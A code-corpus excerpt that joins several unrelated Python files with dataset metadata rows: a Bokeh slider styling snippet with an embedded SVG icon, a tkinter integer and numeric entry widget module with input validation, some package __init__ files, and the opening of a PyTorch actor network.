<img src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9Im5vIj8+CjwhLS0gQ3JlYXRlZCB3aXRoIElua3NjYXBlIChodHRwOi8vd3d3Lmlua3NjYXBlLm9yZy8pIC0tPgo8c3ZnCiAgIHhtbG5zOmRjPSJodHRwOi8vcHVybC5vcmcvZGMvZWxlbWVudHMvMS4xLyIKICAgeG1sbnM6Y2M9Imh0dHA6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL25zIyIKICAgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIgogICB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIgogICB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciCiAgIHhtbG5zOnNvZGlwb2RpPSJodHRwOi8vc29kaXBvZGkuc291cmNlZm9yZ2UubmV0L0RURC9zb2RpcG9kaS0wLmR0ZCIKICAgeG1sbnM6aW5rc2NhcGU9Imh0dHA6Ly93d3cuaW5rc2NhcGUub3JnL25hbWVzcGFjZXMvaW5rc2NhcGUiCiAgIHdpZHRoPSIxMjUwIgogICBoZWlnaHQ9IjI1MDAiCiAgIGlkPSJzdmcyIgogICBzb2RpcG9kaTp2ZXJzaW9uPSIwLjMyIgogICBpbmtzY2FwZTp2ZXJzaW9uPSIwLjQ2ZGV2K2RldmVsIgogICB2ZXJzaW9uPSIxLjAiCiAgIHNvZGlwb2RpOmRvY25hbWU9IlRpbWVzIE5ldyBSb21hbiBHcmVlayBzbWFsbCBsZXR0ZXIgc2lnbWEuc3ZnIgogICBpbmtzY2FwZTpvdXRwdXRfZXh0ZW5zaW9uPSJvcmcuaW5rc2NhcGUub3V0cHV0LnN2Zy5pbmtzY2FwZSI+CiAgPGRlZnMKICAgICBpZD0iZGVmczQiIC8+CiAgPHNvZGlwb2RpOm5hbWVkdmlldwogICAgIGlkPSJiYXNlIgogICAgIHBhZ2Vjb2xvcj0iI2ZmZmZmZiIKICAgICBib3JkZXJjb2xvcj0iIzY2NjY2NiIKICAgICBib3JkZXJvcGFjaXR5PSIxLjAiCiAgICAgaW5rc2NhcGU6cGFnZW9wYWNpdHk9IjAuMCIKICAgICBpbmtzY2FwZTpwYWdlc2hhZG93PSIyIgogICAgIGlua3NjYXBlOnpvb209IjAuMDg3NSIKICAgICBpbmtzY2FwZTpjeD0iLTUzNy43NzgyMyIKICAgICBpbmtzY2FwZTpjeT0iLTU0LjQwNjEzNCIKICAgICBpbmtzY2FwZTpkb2N1bWVudC11bml0cz0icHgiCiAgICAgaW5rc2NhcGU6Y3VycmVudC1sYXllcj0ibGF5ZXIxIgogICAgIHNob3dncmlkPSJmYWxzZSIKICAgICBpbmtzY2FwZTpzaG93cGFnZXNoYWRvdz0iZmFsc2UiCiAgICAgaW5rc2NhcGU6d2luZG93LXdpZHRoPSIxMjgwIgogICAgIGlua3NjYXBlOndpbmRvdy1oZWlnaHQ9IjEwMDMiCiAgICAgaW5rc2NhcGU6d2luZG93LXg9IjAiCiAgICAgaW5rc2NhcGU6d2luZG93LXk9IjAiIC8+CiAgPG1ldGFkYXRhCiAgICAgaWQ9Im1ldGFkYXRhNyI+CiAgICA8cmRmOlJERj4KICAgICAgPGNjOldvcmsKICAgICAgICAgcmRmOmFib3V0PSIiPgogICAgICAgIDxkYzpmb3JtYXQ+aW1hZ2Uvc3ZnK3htbDwvZGM6Zm9ybWF0PgogICAgICAgIDxkYzp0eXBlCiAgICAgICAgICAgcmRmOnJlc291cmNlPSJodHRwOi8vcHVybC5v
cmcvZGMvZGNtaXR5cGUvU3RpbGxJbWFnZSIgLz4KICAgICAgPC9jYzpXb3JrPgogICAgPC9yZGY6UkRGPgogIDwvbWV0YWRhdGE+CiAgPGcKICAgICBpbmtzY2FwZTpsYWJlbD0iTGl2ZWxsbyAxIgogICAgIGlua3NjYXBlOmdyb3VwbW9kZT0ibGF5ZXIiCiAgICAgaWQ9ImxheWVyMSIKICAgICB0cmFuc2Zvcm09InRyYW5zbGF0ZSg1MzIuMTQyODgsMTM1OS4wNjY0KSI+CiAgICA8cGF0aAogICAgICAgc3R5bGU9ImZvbnQtc2l6ZToyMDQ4cHg7Zm9udC1zdHlsZTpub3JtYWw7Zm9udC13ZWlnaHQ6bm9ybWFsO3RleHQtYWxpZ246Y2VudGVyO3RleHQtYW5jaG9yOm1pZGRsZTtmaWxsOiMwMDAwMDA7ZmlsbC1vcGFjaXR5OjE7ZmlsbC1ydWxlOm5vbnplcm87c3Ryb2tlOm5vbmU7c3Ryb2tlLXdpZHRoOjM7c3Ryb2tlLWxpbmVjYXA6YnV0dDtzdHJva2UtbGluZWpvaW46cm91bmQ7c3Ryb2tlLW1pdGVybGltaXQ6MjtzdHJva2UtZGFzaG9mZnNldDowO3N0cm9rZS1vcGFjaXR5OjE7Zm9udC1mYW1pbHk6VGltZXMgTmV3IFJvbWFuIgogICAgICAgZD0iTSA1ODMuODU3MTIsLTM0Ny41NjY0MSBMIDU4My44NTcxMiwtMjAxLjU2NjQxIEwgMTkzLjg1NzEyLC0yMDEuNTY2NDEgQyAyNzkuMTg5NjksLTE1Mi44OTkwMiAzNDguODU2MjksLTkxLjM5OTA4IDQwMi44NTcxMiwtMTcuMDY2NDA2IEMgNDU2Ljg1NjE4LDU3LjI2NzQzOCA0ODMuODU2MTUsMTM2LjEwMDY5IDQ4My44NTcxMiwyMTkuNDMzNTkgQyA0ODMuODU2MTUsMzI4LjEwMDUgNDQxLjAyMjg2LDQxOC4xMDA0MSAzNTUuMzU3MTIsNDg5LjQzMzU5IEMgMjY5LjY4OTcsNTYwLjc2NjkzIDE3Mi41MjMxMyw1OTYuNDMzNTcgNjMuODU3MTE3LDU5Ni40MzM1OSBDIC02NC44MDk5NjQsNTk2LjQzMzU3IC0xNzUuODA5ODUsNTQ1LjkzMzYyIC0yNjkuMTQyODgsNDQ0LjkzMzU5IEMgLTM2Mi40NzYzMywzNDMuOTMzODIgLTQwOS4xNDI5NSwyMjYuNDMzOTQgLTQwOS4xNDI4OCw5Mi40MzM1OTQgQyAtNDA5LjE0Mjk1LC0yLjIzMjUwMjMgLTM4NC42NDI5OCwtODUuODk5MDg1IC0zMzUuNjQyODgsLTE1OC41NjY0MSBDIC0yODYuNjQzMDgsLTIzMS4yMzIyNyAtMjI5LjY0MzEzLC0yODAuODk4ODkgLTE2NC42NDI4OCwtMzA3LjU2NjQxIEMgLTk5LjY0MzI2MywtMzM0LjIzMjE3IC0xMS44MTAwMTcsLTM0Ny41NjU0OSA5OC44NTcxMTcsLTM0Ny41NjY0MSBMIDU4My44NTcxMiwtMzQ3LjU2NjQxIHogTSAxMjYuODU3MTIsLTIwMS41NjY0MSBMIDkxLjg1NzExNywtMjAxLjU2NjQxIEMgLTguMTQzMzU0MywtMjAxLjU2NTY0IC04Ny45NzY2MDgsLTE3Ni43MzIzMyAtMTQ3LjY0Mjg4LC0xMjcuMDY2NDEgQyAtMjA3LjMwOTgyLC03Ny4zOTkwOTQgLTIzNy4xNDMxMywwLjQzNDE2MTc1IC0yMzcuMTQyODgsMTA2LjQzMzU5IEMgLTIzNy4xNDMxMywyMTkuMTAwNjEgLTIwNS44MDk4MiwzMTguNjAwNTEgLTE0My4xNDI4OCw0MDQuOTMzNTkgQyAtODAuNDc2NjE1LDQ5MS4yNjcgLTcuMTQzMzU1Myw1MzQuNDMzNjMg
NzYuODU3MTE3LDUzNC40MzM1OSBDIDE0NC4xODk4Myw1MzQuNDMzNjMgMTk5Ljg1NjQ0LDUwMS45MzM2NiAyNDMuODU3MTIsNDM2LjkzMzU5IEMgMjg3Ljg1NjM1LDM3MS45MzM3OSAzMDkuODU2MzMsMjkzLjQzMzg3IDMwOS44NTcxMiwyMDEuNDMzNTkgQyAzMDkuODU2MzMsNTUuNDM0MTA3IDI0OC44NTYzOSwtNzguODk5MDkyIDEyNi44NTcxMiwtMjAxLjU2NjQxIEwgMTI2Ljg1NzEyLC0yMDEuNTY2NDEgeiIKICAgICAgIGlkPSJ0ZXh0MjMzMiIgLz4KICA8L2c+Cjwvc3ZnPgo="
width=10, height=20, style="margin-right:5px;"></img>
""",
css_classes=["custom-slider-title"],
)
# Custom CSS
style = lambda: Div(
text="""
<style>
.custom-slider {
left: 5px !important;
}
.custom-slider .bk-slider-title {
margin-left: -3px;
}
.custom-slider .bk-slider-value {
font-weight: unset;
}
.custom-slider-title {
position: relative !important;
text-align: right;
width: 20px !important;
height: 20px;
}
.seed-button .bk-btn {
padding: 6px 6px !important;
transform: rotate(-90deg);
background-color: #ffe0c6 !important;
margin-top: 45px;
height: 30px;
margin-left: -30px;
}
.colorbar-slider .bk-noUi-draggable {
%s
}
</style>
"""
% plasma
)
| 162.830508 | 4,365 | 0.946497 | 160 | 9,607 | 56.76875 | 0.4875 | 0.007927 | 0.004294 | 0.003523 | 0.031047 | 0.031047 | 0.024441 | 0.024441 | 0.024441 | 0.024441 | 0 | 0.119316 | 0.031644 | 9,607 | 58 | 4,366 | 165.637931 | 0.857035 | 0.004268 | 0 | 0.14 | 0 | 0.04 | 0.972077 | 0.891027 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.14 | 0 | 0.14 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4b807287da3c4bf49a92c625c1bcd341834befe1 | 16,253 | py | Python | tesliper/gui/components/numeric_entry.py | mishioo/tesliper | e09dcbc0eeb5cc5f7d612ea7f913e4c5dd58a327 | [
"BSD-2-Clause"
] | null | null | null | tesliper/gui/components/numeric_entry.py | mishioo/tesliper | e09dcbc0eeb5cc5f7d612ea7f913e4c5dd58a327 | [
"BSD-2-Clause"
] | 4 | 2022-02-24T18:28:39.000Z | 2022-03-23T16:27:59.000Z | tesliper/gui/components/numeric_entry.py | mishioo/tesliper | e09dcbc0eeb5cc5f7d612ea7f913e4c5dd58a327 | [
"BSD-2-Clause"
] | null | null | null | import logging
import math
import operator
import sys
import tkinter as tk
from tkinter import ttk
logger = logging.getLogger(__name__)
# TODO: refactor IntegerEntry and NumericEntry to have common base class
class IntegerEntry(ttk.Entry):
"""Entry Entry that holds an integer value. Implements validation."""
def __init__(
self,
parent,
scroll_rate=1,
min_value=float("-inf"),
max_value=float("inf"),
include_min_value=True,
include_max_value=True,
**kwargs,
):
self.scroll_rate = scroll_rate
self.min_value = min_value
self.max_value = max_value
self.include_min_value = include_min_value
self.include_max_value = include_max_value
kwargs["textvariable"] = kwargs.get("textvariable", None) or tk.StringVar()
kwargs["validate"] = kwargs.get("validate", None) or "all"
if "validatecommand" not in kwargs:
validatecommand = (
parent.register(self._validate),
"%S",
"%P",
"%s",
"%V",
"%d",
)
kwargs["validatecommand"] = validatecommand
if "invalidcommand" not in kwargs:
invalidcommand = (
parent.register(self._on_invalid),
"%S",
"%P",
"%s",
"%V",
"%d",
)
kwargs["invalidcommand"] = invalidcommand
self.var = kwargs["textvariable"]
self._previous = "" # used to recover after invalid "select all + paste"
super().__init__(parent, **kwargs)
self.bind("<MouseWheel>", self._on_mousewheel)
# For Linux
self.bind("<Button-4>", self._on_mousewheel)
self.bind("<Button-5>", self._on_mousewheel)
# loose focus to parent on Enter key press
self.bind("<Return>", lambda _e, p=parent: p.focus_set())
def configure(self, cnf=None, **kwargs):
customs = [
"min_value",
"max_value",
"include_min_value",
"include_max_value",
]
for key in customs:
value = kwargs.pop(key, None)
if value is not None:
setattr(self, key, value)
super().configure(cnf, **kwargs)
self.update()
def is_in_bounds(self, value):
upper_op = operator.le if self.include_max_value else operator.lt
lower_op = operator.ge if self.include_min_value else operator.gt
return upper_op(value, self.max_value) and lower_op(value, self.min_value)
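The operator-module lookup above picks a strict or non-strict comparison per bound; the same logic extracted as a standalone function for illustration (the parameter names here are illustrative):

```python
import operator

def is_in_bounds(value, min_value, max_value, include_min=True, include_max=True):
    # operator.le/operator.lt give <= / <, operator.ge/operator.gt give >= / >,
    # so each bound can independently be inclusive or exclusive.
    upper_op = operator.le if include_max else operator.lt
    lower_op = operator.ge if include_min else operator.gt
    return upper_op(value, max_value) and lower_op(value, min_value)

print(is_in_bounds(10, 0, 10))                     # True: inclusive upper bound
print(is_in_bounds(10, 0, 10, include_max=False))  # False: exclusive upper bound
```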
def update(self, value=None):
if value is None and not self.get():
logger.debug(f"Update aborted, {self} deliberately empty.")
return
value = value if value is not None else self.get()
try:
self.var.set(self.format(value))
except ValueError:
logger.warning(
f"Cannot update {self}: {repr(value)} can't be converted to int"
)
@staticmethod
def format(value):
value = "{:d}".format(int(value))
return value
@property
def allowed_chars(self):
allowed = "0123456789"
if self.min_value < 0:
allowed += "-"
return allowed
def _on_mousewheel(self, event):
if event is not None:
logger.debug(f"Event caught by {self}._on_mousewheel handler.")
try:
current = int(self.var.get())
except ValueError:
convertible = False
else:
convertible = True
if str(self["state"]) == "disabled" or not convertible:
return # ignore event if widget is disabled or editing is unfinished
delta = event.delta if sys.platform == "darwin" else int(event.delta / 120)
current = int(self.var.get())
updated = current + self.scroll_rate * delta
if self.is_in_bounds(updated):
self.var.set(self.format(updated))
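# A minimal sketch of the delta normalization performed above: Windows and X11
# report wheel steps in multiples of +/-120, while macOS already delivers small
# step counts (the platform strings are the ones sys.platform would report):

```python
import sys

def normalized_delta(raw_delta, platform=sys.platform):
    # Windows/X11 report wheel steps as multiples of +/-120;
    # macOS already delivers small step counts, so it is passed through
    return raw_delta if platform == "darwin" else int(raw_delta / 120)

print(normalized_delta(-240, platform="win32"))  # -2
print(normalized_delta(3, platform="darwin"))    # 3
```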
def _validate(self, change, after, before, reason, action_code):
"""Enables only values that cen be interpreted as floats."""
logger.debug(
f"Input in {self} validation: change={change}, after={after}, "
f"before={before}, reason={reason}."
)
if reason == "focusin":
self._previous = before
if action_code and any(c not in self.allowed_chars for c in change):
return False
if "-" in change and "-" in before and action_code:
return False # do not allow double sign
if "-" in after and not after.startswith("-"):
return False # only allow sign in the beginning
if not after and reason == "focusout":
return False # do not allow no value
if reason == "focusout":
try:
converted = int(after)
except ValueError:
return False
if not self.is_in_bounds(converted):
return False
self.var.set(self.format(after)) # format only on valid "focusout"
return True
def _on_invalid(self, change, after, before, reason, action_code):
"""Change value to form accepted by float constructor."""
logger.debug(
f"Input in {self} invalid: change={change}, after={after}, "
f"before={before}, reason={reason}."
)
if (
"-" in change
and not before.startswith("-")
and action_code # not deletion
and self.min_value < 0
):
after = "-" + before
elif change == "-" and before.startswith("-") and action_code:
after = before[1:]
if after == "-" and self.min_value < 0:
after = after + "0"
try:
converted = int(after)
if not self.is_in_bounds(converted) and reason == "focusout":
raise ValueError # treat out-of-bounds value as invalid on "focusout"
except ValueError:
# revert if invalid float
after = self._previous if reason == "focusout" else before
else:
# format only on "focusout"
after = self.format(after) if reason == "focusout" else after
self.var.set(after)
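# The sign-toggling behaviour of _on_invalid can be sketched in isolation;
# apply_sign_fix below is a hypothetical standalone mirror of the two sign
# branches, with action_code taken as an int for simplicity:

```python
def apply_sign_fix(change, before, action_code, min_value):
    # mirrors the two sign branches of _on_invalid: typing "-" toggles
    # the sign instead of being rejected (action_code is an int here
    # for simplicity; Tk passes it as the %d substitution)
    if "-" in change and not before.startswith("-") and action_code and min_value < 0:
        return "-" + before
    if change == "-" and before.startswith("-") and action_code:
        return before[1:]
    return before

print(apply_sign_fix("-", "42", 1, -100))   # '-42'
print(apply_sign_fix("-", "-42", 1, -100))  # '42'
```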
class NumericEntry(ttk.Entry):
"""Entry that holds a numeric value. Implements validation and changing value
on mouse wheel event.
Parameters
----------
scroll_rate : float
Value to add to/subtract from the current value on a scroll wheel event.
Must not be specified if scroll_factor is given.
scroll_factor : float
Value by which to multiply/divide the current value on a scroll wheel event.
Must not be specified if scroll_rate is given.
scroll_modifier : callable(float, int) -> float
Custom function calculating the new value after a mouse wheel event.
Must accept the current value and a standardized scroll delta as parameters.
Raises
------
TypeError
If both scroll_rate and scroll_factor are specified.
"""
def __init__(
self,
parent,
scroll_rate=None,
scroll_factor=None,
scroll_modifier=None,
decimal_digits=4,
rounding=None, # or "up" or "down"
keep_trailing_zeros=False,
min_value=float("-inf"),
max_value=float("inf"),
include_min_value=True,
include_max_value=True,
**kwargs,
):
self.scroll_factor = scroll_factor
self.scroll_rate = scroll_rate
self.scroll_modifier = scroll_modifier
self.decimal_digits = decimal_digits
self.rounding = rounding
self.keep_trailing_zeros = keep_trailing_zeros
self.min_value = min_value
self.max_value = max_value
self.include_min_value = include_min_value
self.include_max_value = include_max_value
kwargs["textvariable"] = kwargs.get("textvariable", None) or tk.StringVar()
kwargs["validate"] = kwargs.get("validate", None) or "all"
if "validatecommand" not in kwargs:
validatecommand = (
parent.register(self._validate),
"%S",
"%P",
"%s",
"%V",
"%d",
)
kwargs["validatecommand"] = validatecommand
if "invalidcommand" not in kwargs:
invalidcommand = (
parent.register(self._on_invalid),
"%S",
"%P",
"%s",
"%V",
"%d",
)
kwargs["invalidcommand"] = invalidcommand
self.var = kwargs["textvariable"]
self._previous = "" # used to recover after invalid "select all + paste"
super().__init__(parent, **kwargs)
self.bind("<MouseWheel>", self._on_mousewheel)
# For Linux
self.bind("<Button-4>", self._on_mousewheel)
self.bind("<Button-5>", self._on_mousewheel)
# lose focus to parent on Enter key press
self.bind("<Return>", lambda _e, p=parent: p.focus_set())
def is_in_bounds(self, value):
upper_op = operator.le if self.include_max_value else operator.lt
lower_op = operator.ge if self.include_min_value else operator.gt
return upper_op(value, self.max_value) and lower_op(value, self.min_value)
def configure(self, cnf=None, **kwargs):
customs = [
"scroll_rate",
"scroll_factor",
"scroll_modifier",
"decimal_digits",
"keep_trailing_zeros",
"min_value",
"max_value",
"include_min_value",
"include_max_value",
]
for key in customs:
value = kwargs.pop(key, None)
if value is not None:
setattr(self, key, value)
super().configure(cnf, **kwargs)
self.update()
def round(self, value):
factor = 10 ** self.decimal_digits
if self.rounding == "up":
return math.ceil(value * factor) / factor
elif self.rounding == "down":
return math.floor(value * factor) / factor
else:
return round(value, self.decimal_digits)
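# A standalone sketch of the rounding modes above (round_to is an illustrative
# mirror of NumericEntry.round, not part of the class): the default path uses
# Python's round(), which rounds half to even, while "up" and "down" force
# ceil/floor at the chosen precision.

```python
import math

def round_to(value, decimal_digits, rounding=None):
    # half-to-even by default; "up"/"down" force ceil/floor
    factor = 10 ** decimal_digits
    if rounding == "up":
        return math.ceil(value * factor) / factor
    if rounding == "down":
        return math.floor(value * factor) / factor
    return round(value, decimal_digits)

print(round_to(1.25, 1, "up"))    # 1.3
print(round_to(1.25, 1, "down"))  # 1.2
print(round_to(1.25, 1))          # 1.2 (round() rounds half to even)
```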
def update(self, value=None):
if value is None and not self.get():
logger.debug(f"Update aborted, {self} deliberately empty.")
return
value = value if value is not None else self.get()
value = self.round(value) if isinstance(value, float) else value
try:
self.var.set(self.format(value))
except ValueError:
logger.warning(
f"Cannot update {self}: {repr(value)} can't be converted to float"
)
@property
def scroll_factor(self):
return self._scroll_factor
@scroll_factor.setter
def scroll_factor(self, value):
if value is not None and getattr(self, "scroll_rate", None) is not None:
raise TypeError("Only one of scroll_rate or scroll_factor may be specified.")
self._scroll_factor = value
@property
def scroll_rate(self):
return self._scroll_rate
@scroll_rate.setter
def scroll_rate(self, value):
if value is not None and getattr(self, "scroll_factor", None) is not None:
raise TypeError("Only one of scroll_rate or scroll_factor may be specified.")
self._scroll_rate = value
@property
def scroll_modifier(self):
if self._scroll_modifier is not None:
return self._scroll_modifier
elif getattr(self, "scroll_rate") is not None:
return lambda v, d, r=self.scroll_rate: v + r * d
elif getattr(self, "scroll_factor") is not None:
return lambda v, d, f=self.scroll_factor: v * f ** d
else:
return lambda v, d: v
@scroll_modifier.setter
def scroll_modifier(self, value):
self._scroll_modifier = value
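# The fallback chain in the scroll_modifier getter amounts to three
# interchangeable strategies; make_modifier below is a hypothetical standalone
# equivalent (additive for a rate, multiplicative for a factor, identity
# otherwise):

```python
def make_modifier(scroll_rate=None, scroll_factor=None):
    # additive stepping with a rate, multiplicative with a factor,
    # identity when neither is configured
    if scroll_rate is not None:
        return lambda v, d: v + scroll_rate * d
    if scroll_factor is not None:
        return lambda v, d: v * scroll_factor ** d
    return lambda v, d: v

print(make_modifier(scroll_rate=0.5)(10.0, 2))   # 11.0
print(make_modifier(scroll_factor=2)(10.0, -1))  # 5.0
print(make_modifier()(7.0, 3))                   # 7.0
```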
def format(self, value):
formatter = f"{{:.{self.decimal_digits}f}}"
value = formatter.format(float(value))
if not self.keep_trailing_zeros:
value = value.rstrip("0") # discard insignificant trailing zeros
if value.endswith("."):
value += "0" # but keep at least one decimal digit
return value
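# A sketch of the trailing-zero handling above, as a standalone function
# (format_decimal is an illustrative name, not the widget method):

```python
def format_decimal(value, decimal_digits=4, keep_trailing_zeros=False):
    # fixed-point formatting, then optionally strip insignificant zeros
    # while keeping at least one decimal digit
    text = "{:.{}f}".format(float(value), decimal_digits)
    if not keep_trailing_zeros:
        text = text.rstrip("0")
        if text.endswith("."):
            text += "0"
    return text

print(format_decimal(1.5))                          # '1.5'
print(format_decimal(2))                            # '2.0'
print(format_decimal(2, keep_trailing_zeros=True))  # '2.0000'
```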
def _on_mousewheel(self, event):
if event is not None:
logger.debug(f"Event caught by {self}._on_mousewheel handler.")
try:
_ = float(self.var.get())
except ValueError:
convertible = False
else:
convertible = True
if str(self["state"]) == "disabled" or not convertible:
return # ignore event if widget is disabled or editing is unfinished
delta = event.delta if sys.platform == "darwin" else int(event.delta / 120)
current = float(self.var.get())
updated = self.scroll_modifier(current, delta)
updated = self.format(updated)
if self.is_in_bounds(float(updated)):
self.var.set(updated)
@property
def allowed_chars(self):
allowed = "0123456789.,"
if self.min_value < 0:
allowed += "-"
return allowed
def _validate(self, change, after, before, reason, action_code):
"""Enables only values that cen be interpreted as floats."""
logger.debug(
f"Input in {self} validation: change={change}, after={after}, "
f"before={before}, reason={reason}."
)
if reason == "focusin":
self._previous = before
if action_code and any(c not in self.allowed_chars for c in change):
return False
if (
any(c in ".," for c in change)
and any(c in ".," for c in before)
and any(c in ".," for c in after)
):
return False # do not allow double decimal separator
if "-" in change and "-" in before and action_code:
return False # do not allow double sign
if "-" in after and not after.startswith("-"):
return False # only allow sign in the beginning
if after in ".,-" or after.endswith((".", ",")):
# includes also unfinished negative float
return reason != "focusout" # consider it invalid only when typing is over
if not after and reason == "focusout":
return False # do not allow no value
if reason == "focusout":
try:
converted = float(after)
except ValueError:
return False
if not self.is_in_bounds(converted):
return False
self.var.set(self.format(after)) # format only on valid "focusout"
return True
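# The double-separator rule above can be checked in isolation;
# has_second_separator is an illustrative standalone mirror of the three
# any() tests:

```python
def has_second_separator(change, before, after):
    # a second "." or "," is rejected once one separator is already present
    seps = ".,"
    return (any(c in seps for c in change)
            and any(c in seps for c in before)
            and any(c in seps for c in after))

print(has_second_separator(".", "1.2", "1.2."))  # True
print(has_second_separator(".", "12", "1.2"))    # False
```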
def _on_invalid(self, change, after, before, reason, action_code):
"""Change value to form accepted by float constructor."""
logger.debug(
f"Input in {self} invalid: change={change}, after={after}, "
f"before={before}, reason={reason}."
)
if (
"-" in change
and not before.startswith("-")
and action_code # not deletion
and self.min_value < 0
):
after = "-" + before
elif change == "-" and before.startswith("-") and action_code:
after = before[1:]
if "," in after:
# treat both comma and dot as a decimal separator
after = after.replace(",", ".")
if after.endswith("."):
after = after + "0"
if after == "-" and self.min_value < 0:
after = after + "0"
try:
converted = float(after)
if not self.is_in_bounds(converted) and reason == "focusout":
raise ValueError # treat out-of-bounds value as invalid on "focusout"
except ValueError:
# revert if invalid float
after = self._previous if reason == "focusout" else before
else:
# format only on "focusout"
after = self.format(after) if reason == "focusout" else after
self.var.set(after)
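# The comma/dot normalization performed above, sketched as a standalone helper
# (normalize_decimal_text is an illustrative name):

```python
def normalize_decimal_text(after):
    # both "," and "." are accepted while typing, but float() needs "."
    if "," in after:
        after = after.replace(",", ".")
    if after.endswith("."):
        after += "0"  # "7." -> "7.0"
    return after

print(normalize_decimal_text("3,14"))  # '3.14'
print(normalize_decimal_text("7."))    # '7.0'
```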
| 36.523596 | 87 | 0.568818 | 1,886 | 16,253 | 4.773065 | 0.130965 | 0.023106 | 0.012997 | 0.007998 | 0.748611 | 0.732504 | 0.717507 | 0.701733 | 0.701733 | 0.701733 | 0 | 0.004318 | 0.330339 | 16,253 | 444 | 88 | 36.605856 | 0.822767 | 0.127115 | 0 | 0.731903 | 0 | 0 | 0.114186 | 0.00498 | 0 | 0 | 0 | 0.002252 | 0 | 1 | 0.067024 | false | 0 | 0.016086 | 0.005362 | 0.182306 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4b8da095aea7babc9f9fef817638723ba12ec0d8 | 64 | py | Python | minato_namikaze/bot_files/lib/database/discord_database/__init__.py | Dhruvacube/dhruva-shaw-bot | 7300daf9353a17b6c6d69a8a932317e7c83299e5 | [
"Apache-2.0"
] | 1 | 2021-03-02T14:31:53.000Z | 2021-03-02T14:31:53.000Z | minato_namikaze/bot_files/lib/database/discord_database/__init__.py | Dhruvacube/yondaime-hokage | 0a2ea21bcb3a75baadb5c080a5dc6382f1fa7c71 | [
"Apache-2.0"
] | 62 | 2021-02-27T15:41:08.000Z | 2021-05-13T14:21:31.000Z | minato_namikaze/bot_files/lib/database/discord_database/__init__.py | Dhruvacube/dhruva-shaw-bot | 7300daf9353a17b6c6d69a8a932317e7c83299e5 | [
"Apache-2.0"
] | 1 | 2021-03-07T10:03:55.000Z | 2021-03-07T10:03:55.000Z | from .backup import *
from .badges import *
from .tags import *
| 16 | 21 | 0.71875 | 9 | 64 | 5.111111 | 0.555556 | 0.434783 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1875 | 64 | 3 | 22 | 21.333333 | 0.884615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
29b9200d03bd44156d57d11954d20228a29fc75a | 41 | py | Python | kerasutils/losses/__init__.py | tchaye59/kerasutils | 2849a35a246282851f5cdc22625b2afefb81bf65 | [
"MIT"
] | null | null | null | kerasutils/losses/__init__.py | tchaye59/kerasutils | 2849a35a246282851f5cdc22625b2afefb81bf65 | [
"MIT"
] | null | null | null | kerasutils/losses/__init__.py | tchaye59/kerasutils | 2849a35a246282851f5cdc22625b2afefb81bf65 | [
"MIT"
] | null | null | null | from kerasutils.losses.bb_losses import * | 41 | 41 | 0.853659 | 6 | 41 | 5.666667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.073171 | 41 | 1 | 41 | 41 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
29b9b4a91e445562a3745bc676cb7eb4deb065f7 | 5,120 | py | Python | code/model.py | ptrtmv/DRL_MultiAgent_Tenis | b26a281d4c63d7a9abf850235423d3019cdd244a | [
"MIT"
] | null | null | null | code/model.py | ptrtmv/DRL_MultiAgent_Tenis | b26a281d4c63d7a9abf850235423d3019cdd244a | [
"MIT"
] | null | null | null | code/model.py | ptrtmv/DRL_MultiAgent_Tenis | b26a281d4c63d7a9abf850235423d3019cdd244a | [
"MIT"
] | 1 | 2019-07-06T12:45:11.000Z | 2019-07-06T12:45:11.000Z | '''
Created on Jun 25, 2019
@author: ptrtmv
'''
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
def hidden_init(layer):
fan_in = layer.weight.data.size()[0]
lim = 1. / np.sqrt(fan_in)
return (-lim, lim)
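# The limits computed by hidden_init depend only on the layer's fan-in; the
# torch-free sketch below shows the same +/- 1/sqrt(fan_in) range used for
# uniform initialization:

```python
import math

def hidden_init_limits(fan_in):
    # symmetric uniform range +/- 1/sqrt(fan_in), as used above
    lim = 1.0 / math.sqrt(fan_in)
    return (-lim, lim)

print(hidden_init_limits(4))    # (-0.5, 0.5)
print(hidden_init_limits(256))  # (-0.0625, 0.0625)
```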
class Actor(nn.Module):
"""Actor (Policy) Model."""
def __init__(self, stateSize,actionSize,
hiddenLayers=[256,128],
batchNormAfterLayers=None,
seed = None):
"""Initialize parameters and build model.
Params
======
"""
super(Actor, self).__init__()
self.seed = torch.manual_seed(seed) if seed is not None else None # seeding with None would raise
